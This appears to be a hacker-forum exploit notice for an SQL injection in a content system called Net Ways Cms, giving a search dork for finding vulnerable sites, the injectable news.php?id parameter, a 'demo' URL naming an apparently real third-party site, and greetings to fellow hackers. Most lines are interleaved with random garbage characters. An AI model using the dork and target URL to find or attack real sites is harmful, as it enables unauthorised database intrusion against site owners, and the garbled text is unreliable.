################################################################################??########
/ m, V8 _; h# w ^; j2 F; l8 Z# & z8 V3 ?0 F2 Q: e
# Exploit Title : Net Ways Cms Sql Injection Vulnerability 4 _8 F3 r0 E) V3 ]
# 8 P1 _7 J1 j/ F" N) O* u
# Author : IrIsT.Ir
9 K! ^% T! h+ B* D7 F# 4 ~, m0 a m( R$ ]% X
# Discovered By : Am!r
- K4 o. K. A) k7 A/ w/ R- t#
p; w; ?4 ^8 P/ [# Home : http://IrIsT.Ir/forum 6 w3 I* A, J/ p/ X% q! t
# " ^, i) a# i- P: I
# Software Link : http://www.netways.com/ www.political-security.com
# d7 [' R9 V6 z( g#
; Q* G- u7 b5 V! K8 M5 q; {# Security Risk : High
4 A% f! U1 |6 d# " ^# F; G/ l5 e# P- _& g9 e4 x2 r( W
# Version : All Version
$ N8 y# n W: y2 V# , Z/ D% ~# {1 ~6 V; z C; F1 f1 D
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
+ J# H+ B; N8 [0 V" N- n T4 p# 4 u( Y5 p; S$ K$ P! |
# Dork : intext:"Designed & developed by NetWays"
+ @8 {) j3 u- Y1 f$ Z9 ]8 M#
. e- }5 g% H: w# C2 k; L################################################################################??######## . K, x3 n/ i4 ~$ e1 ^# A+ P
#
9 @; \1 L. ]; Y# Expl0iTs : W1 u- J0 _+ v" P5 C4 U% t
# / R; F$ v& D/ E. I& a1 ?
# http://target.com/news.php?id=[Sql] 9 W& M) w: a3 m' z* T+ E
# 0 D. Z! @' [9 T5 e' O
#
( }: _6 Y9 x; z" m D, x# D3mo :
0 X, ?& ^" ^! P. v3 M g# g* ~& M0 f, F' z- v2 `6 P
# http://compagnieparento.com/news.php?id=7[Sql] M" b! C$ `5 M' q3 u9 t
# : @! ~. u$ R7 ~* h
################################################################################??######## 1 P: e! K7 K4 K. x) E
#
4 w+ n8 P8 _! U R$ }# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
" {8 v3 F) f/ w' P, ^#
" ^: b8 P- y; f5 j8 K4 L" e# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
- M+ x U- F9 ~6 [- P0 [# / Y7 M! k/ z4 j5 {3 W7 }0 D
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 4 a7 N% C! u$ x5 M* ]4 m% {
# 4 L- c: Q! R1 `! a8 Y6 K5 R
################################################################################??######## |